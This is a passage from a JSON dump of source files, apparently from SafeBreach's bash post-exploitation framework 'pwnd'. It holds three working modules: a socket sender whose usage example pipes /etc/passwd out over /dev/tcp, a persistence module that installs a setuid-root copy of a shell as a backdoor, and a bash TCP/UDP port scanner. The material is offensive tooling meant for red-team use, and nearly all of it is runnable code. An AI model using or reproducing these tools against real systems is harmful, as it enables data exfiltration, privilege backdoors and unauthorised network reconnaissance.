    "content": "###########################################################################\n#                                                                         #\n# Copyright (c) 2016, SafeBreach                                          #\n# All rights reserved.                                                    #\n#                                                                         #\n# Redistribution and use in source and binary forms, with or without      #\n# modification, are permitted provided that the following conditions are  #\n# met:                                                                    #\n#                                                                         #\n#  1. Redistributions of source code must retain the above                #\n# copyright notice, this list of conditions and the following             #\n# disclaimer.                                                             #\n#                                                                         #\n#  2. Redistributions in binary form must reproduce the                   #\n# above copyright notice, this list of conditions and the following       #\n# disclaimer in the documentation and/or other materials provided with    #\n# the distribution.                                                       #\n#                                                                         #\n#  3. Neither the name of the copyright holder                            #\n# nor the names of its contributors may be used to endorse or promote     #\n# products derived from this software without specific prior written      #\n# permission.                                                             
#\n#                                                                         #\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS                      #\n# AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,         #\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF                #\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.    #\n# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR    #\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL  #\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE       #\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS           #\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER    #\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR         #\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF  #\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.                              #\n#                                                                         #\n###########################################################################\n\n# over_socket, A simple yet \"cross platform\" implementation of generic TCP and UDP socket using bash sockets\n\n__over_socket_usage() {\n  cat << \"EOF\"\nusage: over_socket [-u] host port\n    A simple yet \"cross platform\" implementation of generic TCP and UDP socket\n    using bash sockets. HOST can be IPv4 address or hostname. PORT is a TCP\n    (by default) port number. 
The `-u' if specified says use UDP instead of\n    the default option of TCP.\n\n    Example:\n\n    $ cat /etc/passwd | over_socket localhost 80\n\n      This will open connection to localhost at port 80 TCP and will send over\n      the content of `/etc/passwd'\nEOF\n  return 0\n}\n\n\nover_socket() {\n  local host proto port\n\n  if [ \"${1-}\" == \"-u\" ]; then\n    if [ -z \"${3-}\" ]; then\n  \t   __over_socket_usage\n       return 0\n    fi\n    host=\"$2\"\n    proto=\"udp\"\n    port=\"$3\"\n  else\n    if [ -z \"${2-}\" ]; then\n       __over_socket_usage\n       return 0\n    fi\n    proto=\"tcp\"\n    port=\"$2\"\n    host=\"$1\"\n  fi\n\n  cat /dev/stdin > \"/dev/$proto/$host/$port\"\n}\n\npwnd_register_cmd over_socket \"A simple yet \\\"cross platform\\\" implementation of generic TCP and UDP socket using bash sockets\"\n"
  },
  {
    "path": "pwnd/persistence/rootshell.bash",
    "content": "###########################################################################\n#                                                                         #\n# Copyright (c) 2016, SafeBreach                                          #\n# All rights reserved.                                                    #\n#                                                                         #\n# Redistribution and use in source and binary forms, with or without      #\n# modification, are permitted provided that the following conditions are  #\n# met:                                                                    #\n#                                                                         #\n#  1. Redistributions of source code must retain the above                #\n# copyright notice, this list of conditions and the following             #\n# disclaimer.                                                             #\n#                                                                         #\n#  2. Redistributions in binary form must reproduce the                   #\n# above copyright notice, this list of conditions and the following       #\n# disclaimer in the documentation and/or other materials provided with    #\n# the distribution.                                                       #\n#                                                                         #\n#  3. Neither the name of the copyright holder                            #\n# nor the names of its contributors may be used to endorse or promote     #\n# products derived from this software without specific prior written      #\n# permission.                                                             
#\n#                                                                         #\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS                      #\n# AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,         #\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF                #\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.    #\n# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR    #\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL  #\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE       #\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS           #\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER    #\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR         #\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF  #\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.                              #\n#                                                                         #\n###########################################################################\n\n# rootshell, A simple yet \"cross platform\" implementation of rootshell using `chmod u+s' and bash\n\n__install_rootshell_usage() {\n  cat << \"EOF\"\nusage: install_rootshell [/path/to/shell] [/path/to/rootshell]\n    A simple yet \"cross platform\" implementation of rootshell using chmod and\n    bash. /PATH/TO/SHELL is a path to shell (default: $SHELL). /PATH/TO/ROOTSHELL\n    is path to where to install the rootshell (default: mktemp -u)\nEOF\n  return 0\n}\n\n\ninstall_rootshell() {\n  pwnd_isroot || return 1\n\n  local shellfile=${1-$SHELL}\n  local rootshell=${2-$(mktemp -u)}\n\n  cp \"$shellfile\" \"$rootshell\"\n  chmod u+s \"$rootshell\"\n  ls -la \"$rootshell\"\n}\n\npwnd_register_cmd install_rootshell \"A simple yet \\\"cross platform\\\" implementation of rootshell using \\`chmod u+s' and bash\"\n"
  },
  {
    "path": "pwnd/reconnaissance/portscanner.bash",
    "content": "###########################################################################\n#                                                                         #\n# Copyright (c) 2016, SafeBreach                                          #\n# All rights reserved.                                                    #\n#                                                                         #\n# Redistribution and use in source and binary forms, with or without      #\n# modification, are permitted provided that the following conditions are  #\n# met:                                                                    #\n#                                                                         #\n#  1. Redistributions of source code must retain the above                #\n# copyright notice, this list of conditions and the following             #\n# disclaimer.                                                             #\n#                                                                         #\n#  2. Redistributions in binary form must reproduce the                   #\n# above copyright notice, this list of conditions and the following       #\n# disclaimer in the documentation and/or other materials provided with    #\n# the distribution.                                                       #\n#                                                                         #\n#  3. Neither the name of the copyright holder                            #\n# nor the names of its contributors may be used to endorse or promote     #\n# products derived from this software without specific prior written      #\n# permission.                                                             
#\n#                                                                         #\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS                      #\n# AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,         #\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF                #\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.    #\n# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR    #\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL  #\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE       #\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS           #\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER    #\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR         #\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF  #\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.                              #\n#                                                                         #\n###########################################################################\n\n# portscanner, A simple yet \"cross platform\" implementation of TCP and UDP port scanner using bash sockets\n\n__portscanner_usage() {\n  cat << \"EOF\"\nusage: portscanner host [port/proto ...], [port-range/proto ...]>\n    A simple yet \"cross platform\" implementation of portscanner using bash\n    sockets. HOST can be IPv4 address or hostname. PORT can be any port number.\n    PROTO can be `tcp' or `udp'. PORTS is comma-seperated PORTs. 
PORT-RANGE is\n    any range between 1 to 65535 following `/tcp' or `/udp' postfix.\n\n    Examples:\n\n      $ portscanner localhost 80/tcp\n\n        This will check if TCP port 80 is open on localhost.\n\n      $ portscanner localhost 53/tcp,53/udp\n\n        This will check if TCP port 53 and UDP port 53 are opened on localhost.\n\n      $ portscanner localhost 1-1024/tcp,69/udp\n\n        This will check if TCP ports 1 to 1024 are opened and if UDP port 69\n        is opened on localhost.\nEOF\n  return 0\n}\n\n# TODO: Add alternative implementations for `timeout'-like functionality\n\n__portscanner_timeout() {\n  # Based on: http://stackoverflow.com/questions/601543/command-line-command-to-auto-kill-a-command-after-a-certain-amount-of-time\n  `perl -e 'alarm shift; open STDERR, \"> /dev/null\"; exec @ARGV' \"$@\"`\n  # `` works better than $() in Linux when it comes to suppressing 'Alarm' message _AND_ still having alarm terminating the process\n}\n\n# Based on http://www.catonmat.net/blog/tcp-port-scanner-in-bash/\n\nportscanner() {\n  if [ -z \"${2-}\" ]; then\n    __portscanner_usage\n    return\n  fi\n\n  local host=\"$1\"\n  local ports=()\n  local csv_args=()\n\n  IFS=',' read -ra csv_args <<< \"${@:2}\"\n\n  for arg in \"${csv_args[@]}\"; do\n    case \"$arg\" in\n      *-*)\n        # e.g. 1-1024/tcp\n        local range_ports=()\n        IFS='/' read -ra range_ports <<< \"$arg\"\n        IFS='-' read start end <<< \"${range_ports[0]}\"\n        for ((port=start; port <= end; port++)); do\n          ports+=(\"$port/${range_ports[1]}\")\n        done\n        ;;\n      *,*)\n        # e.g. '53/tcp, 53/udp'\n        IFS=',' read -ra ports <<< \"$arg\"\n        ;;\n      *)\n        # e.g. 
'80/tcp'\n        ports+=(\"$arg\")\n        ;;\n    esac\n  done\n\n  for port in \"${ports[@]}\"; do\n    local conn_parameter=()\n    IFS='/' read -ra conn_parameter <<< \"$port\"\n    __portscanner_timeout 1 \"echo >/dev/${conn_parameter[1]}/$host/${conn_parameter[0]}\" &&\n    echo \"port $port is open\" ||\n    echo \"port $port is closed\"\n  done\n\n}\n\npwnd_register_cmd portscanner \"A simple yet \\\"cross platform\\\" implementation of TCP and UDP port scanner using bash sockets\"\n"
  }
]